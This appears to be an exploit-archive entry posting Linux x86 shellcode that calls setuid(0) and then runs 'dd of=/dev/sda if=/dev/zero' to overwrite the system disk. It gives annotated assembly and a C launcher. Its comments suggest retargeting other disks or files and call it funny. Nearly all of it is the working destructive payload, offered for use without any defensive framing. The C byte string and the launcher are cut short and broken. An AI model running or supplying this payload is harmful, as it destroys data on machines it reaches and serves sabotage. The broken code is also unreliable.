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linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes

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linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes

  * Title : Linux x86 shellcode setuid(0) and dd of=/dev/sda if=/dev/zero, 74 bytes
  * Author : xertux
  * Platform: Linux X86 (7.04)
  * Description : setuid(0) + dd of=/dev/sda if=/dev/zero
  * Size : 74 bytes
  * Decription : Use the dd command, we can change of and if argument to create, modify and destroy datas. Here the sda	disk is format.
  * */

  *BITS 32
  *;Get root privileges
  *xor eax, eax
  *xor ebx, ebx
  *xor ecx, ecx
  *mov al, 0x17
  *int 0x80
  *;exceve(dd of=/dev/sda if=/dev/zero)
  *xor eax, eax      ; eax become 0
  *push eax          ; null string termination
  *push 0x64642f2f   ; push //dd
  *push 0x6e69622f   ; push /bin
  *mov ebx, esp      ; put the address of "/bin//dd" into ebx
  *push eax          ; push null string termination
  *push 0x6164732f   ; push /sda
  *push 0x2f766564   ; push dev/
  *push 0x2f3d666f   ; push of=/
  *mov ecx, esp      ; put the address of "of=/dev//sda" into ecx  ==> you can change to another disk or any files
  *push eax          ; null string termination
  *push 0x6f72657a   ; push zero
  *push 0x2f766564   ; push dev/
  *push 0x2f3d6669   ; push if=/
  *mov edx, esp      ; put the address of "if=/dev/zero" into edx ==> you can try with /dev/random, it's funny ^^
  *push eax          ; push null args termination
  *push edx          ; push "if=/dev/zero"
  *push ecx          ; push "of=/dev//sda"
  *push ebx          ; push /bin//dd
  *mov ecx, esp      ; argument array completed via esp
  *xor edx, edx
  *mov al, 0x0b      ; put the int execve call into al
  *int 0x80          ; system call

#include "stdio.h"

 char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f"

 int main()
           printf(" [*] Shellcode - length: %d\n",strlen(shellcode));
           (*(void(*)()) shellcode)();
           return 0;

#  0day.today [2024-11-15]  #